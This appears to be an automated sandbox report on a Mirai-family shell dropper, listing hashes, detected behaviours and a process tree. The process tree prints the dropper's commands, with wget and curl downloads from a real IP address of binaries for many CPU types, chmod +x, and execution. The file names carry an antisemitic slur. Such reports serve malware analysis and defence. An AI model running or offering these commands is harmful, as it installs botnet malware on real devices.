Analysis
-
max time kernel
135s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
07/12/2024, 04:11
Static task
static1
Behavioral task
behavioral1
Sample
jewn.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
jewn.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
jewn.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
jewn.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
jewn.sh
-
Size
1KB
-
MD5
720a5e4e44f99b055d00bf5be3948b2d
-
SHA1
684fa717c79344199982029892b768a335682f57
-
SHA256
c5529040db9e0e5cbe26dac8162859d8867ae845a6b2fdfdcad8ee2cfe63ff1d
-
SHA512
c9b4f2f2e6f9e0c66421ae95641f013e7be7652e9b4787cc84cab88e24fe18e471b77249de3c210fe410e16312dbef499b5e81b8d03ffb4ad1796f5dc1a04b1a
Malware Config
Extracted
mirai
KURC
Extracted
mirai
KURC
Signatures
-
Mirai family
-
Contacts a large (96092) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 865 chmod 874 chmod 883 chmod 739 chmod 826 chmod 847 chmod 856 chmod 892 chmod 790 chmod 835 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/jewn 740 jewn /tmp/jewn 791 jewn /tmp/jewn 827 jewn /tmp/jewn 836 jewn /tmp/jewn 848 jewn /tmp/jewn 857 jewn /tmp/jewn 866 jewn /tmp/jewn 875 jewn /tmp/jewn 884 jewn /tmp/jewn 893 jewn -
Modifies Watchdog functionality 1 TTPs 14 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/misc/watchdog jewn -
Enumerates active TCP sockets 1 TTPs 7 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn -
Writes file to system bin folder 14 IoCs
description ioc Process File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn -
Changes its process name 7 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself AndwaipDfqEisapb6 827 jewn Changes the process name, possibly in an attempt to hide itself fvwoiqDq 836 jewn Changes the process name, possibly in an attempt to hide itself CxFtrsgB67' 848 jewn Changes the process name, possibly in an attempt to hide itself CsxbyqnD 857 jewn Changes the process name, possibly in an attempt to hide itself kwnhsdtBxsiuyasF4/ 866 jewn Changes the process name, possibly in an attempt to hide itself lyopfrnunekEmqlC$ 875 jewn Changes the process name, possibly in an attempt to hide itself dokwiEElsdAu< 884 jewn -
Reads system network configuration 1 TTPs 7 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/157/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/344/fd jewn File opened for reading /proc/345/fd jewn File opened for reading /proc/677/fd jewn File opened for reading /proc/324/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/679/fd jewn File opened for reading /proc/862/fd jewn File opened for reading /proc/374/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/321/fd jewn File opened for reading /proc/712/fd jewn File opened for reading /proc/868/fd jewn File opened for reading /proc/386/fd jewn File opened for reading /proc/179/fd jewn File opened for reading /proc/345/fd jewn File opened for reading /proc/470/fd jewn File opened for reading /proc/684/fd jewn File opened for reading /proc/345/fd jewn File opened for reading /proc/709/fd jewn File opened for reading /proc/347/fd jewn File opened for reading /proc/1/fd jewn File opened for reading /proc/379/fd jewn File opened for reading /proc/324/fd jewn File opened for reading /proc/379/fd jewn File opened for reading /proc/157/fd jewn File opened for reading /proc/374/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/685/fd jewn File opened for reading /proc/235/fd jewn File opened for reading /proc/677/fd jewn File opened for reading /proc/709/fd jewn File opened for reading /proc/235/fd jewn File opened for reading /proc/321/fd jewn File opened for reading /proc/470/fd jewn File opened for reading /proc/677/fd jewn File opened for reading /proc/870/fd jewn File opened for reading /proc/679/fd jewn File opened for reading /proc/712/fd jewn File opened for reading /proc/1/fd jewn File opened for reading /proc/374/fd jewn File opened for reading /proc/344/fd jewn File opened for reading /proc/679/fd jewn File opened for reading /proc/685/fd jewn File opened for reading /proc/674/fd jewn File opened for reading /proc/709/fd jewn File opened for reading /proc/324/fd jewn File opened for reading /proc/853/fd jewn File opened for reading /proc/321/fd jewn File opened for reading /proc/235/fd jewn File opened for reading /proc/470/fd jewn File opened for reading /proc/1/fd jewn File opened for reading /proc/379/fd jewn File opened for reading /proc/684/fd jewn File opened for reading /proc/344/fd jewn File opened for reading /proc/677/fd jewn File opened for reading /proc/684/fd jewn File opened for reading /proc/685/fd jewn File opened for reading /proc/374/fd jewn File opened for reading /proc/347/fd jewn File opened for reading /proc/347/fd jewn File opened for reading /proc/677/fd jewn -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 742 wget 743 curl 789 cat -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jew.m68k wget File opened for modification /tmp/jew.arm6 wget File opened for modification /tmp/jew.m68k curl File opened for modification /tmp/jew.x86 curl File opened for modification /tmp/jew.mips curl File opened for modification /tmp/jew.mpsl wget File opened for modification /tmp/jew.mpsl curl File opened for modification /tmp/jew.arm4 curl File opened for modification /tmp/jew.arm5 curl File opened for modification /tmp/jew.sh4 curl File opened for modification /tmp/jewn jewn.sh File opened for modification /tmp/jew.arm5 wget File opened for modification /tmp/jew.arm6 curl File opened for modification /tmp/jew.arm7 curl File opened for modification /tmp/jew.ppc curl File opened for modification /tmp/jew.sh4 wget File opened for modification /tmp/jew.x86 wget File opened for modification /tmp/jew.mips wget File opened for modification /tmp/jew.arm7 wget File opened for modification /tmp/jew.ppc wget
Processes
-
/tmp/jewn.sh/tmp/jewn.sh1⤵
- Writes file to tmp directory
PID:709 -
/usr/bin/wgetwget http://104.234.240.71/bins/jew.x862⤵
- Writes file to tmp directory
PID:716
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.x862⤵
- Writes file to tmp directory
PID:733
-
-
/bin/catcat jew.x862⤵PID:738
-
-
/bin/chmodchmod +x jewn jewn.sh jew.x86 systemd-private-51a201d8a5564807b8e716d64963d5ef-systemd-timedated.service-JYTpM22⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:740
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/catcat jew.mips2⤵
- System Network Configuration Discovery
PID:789
-
-
/bin/chmodchmod +x jew.mips jewn jewn.sh jew.x86 systemd-private-51a201d8a5564807b8e716d64963d5ef-systemd-timedated.service-JYTpM22⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:791
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.mpsl2⤵
- Writes file to tmp directory
PID:793
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/catcat jew.mpsl2⤵PID:825
-
-
/bin/chmodchmod +x jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-51a201d8a5564807b8e716d64963d5ef-systemd-timedated.service-JYTpM22⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:827
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.arm42⤵PID:831
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.arm42⤵
- Writes file to tmp directory
PID:833
-
-
/bin/chmodchmod +x jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-51a201d8a5564807b8e716d64963d5ef-systemd-timedated.service-JYTpM22⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:836
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.arm52⤵
- Writes file to tmp directory
PID:842
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x862⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:848
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.arm62⤵
- Writes file to tmp directory
PID:851
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.mips jew.mpsl jewn jewn.sh jew.x862⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:857
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.arm72⤵
- Writes file to tmp directory
PID:860
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.x862⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:866
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.ppc2⤵
- Writes file to tmp directory
PID:871
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.ppc2⤵
- Writes file to tmp directory
PID:872
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x862⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:875
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.m68k2⤵
- Writes file to tmp directory
PID:878
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x862⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:884
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.sh42⤵
- Writes file to tmp directory
PID:887
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.sh42⤵
- Writes file to tmp directory
PID:890
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.sh4 jew.x862⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:893
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD5c790dde9d4762b3e82c0d9e41df91fb9
SHA1341070d0148f795a2b6dd1d988e497f4084bebe7
SHA256e8ca93ec9f737481e131b64981ebf0212958dd1b43ef36a944869ae0f603e6f1
SHA512ffa49eae4d60f3ff6f1b0fe053c5f8293e6eca3737d2805e464336376ca6f705da949936530c595bc33b4c49b7a80d8672f03414f027421394436b26c471697f
-
Filesize
125KB
MD5e20014e57c7c30bb2bda9aa339fc4aff
SHA1a49e3de31275f2f55351494da979e4f9c7e97f3c
SHA256c7b2789a6ad425fc8bc48a6b496a2e2d8951ea80a1c908fc7914e99a11674150
SHA512b6db6b572bed7f1bfc9986a3157f8bb8e07ac31b19df39e7b2182c5d432b87a4165584801d0d3a320e93c8bb1b3cd582fcdff4531af2df75523207444673f2df
-
Filesize
118KB
MD5e763ac9455273a0ebd7773d550965150
SHA10b454e4cd734b07ee063c863fe44835653338f35
SHA2564e566bbc9fba17867653b24298e8258311d7ac6f089b28029886e75ed6985594
SHA5127e545ca2faf134e6a5841060791d9bd0a8bffcb3a1d1c056f6b62ac7ad0fb87aff3781ca628e4678fd7d55040d31b186c572270a5509efd9f081e44702c878b1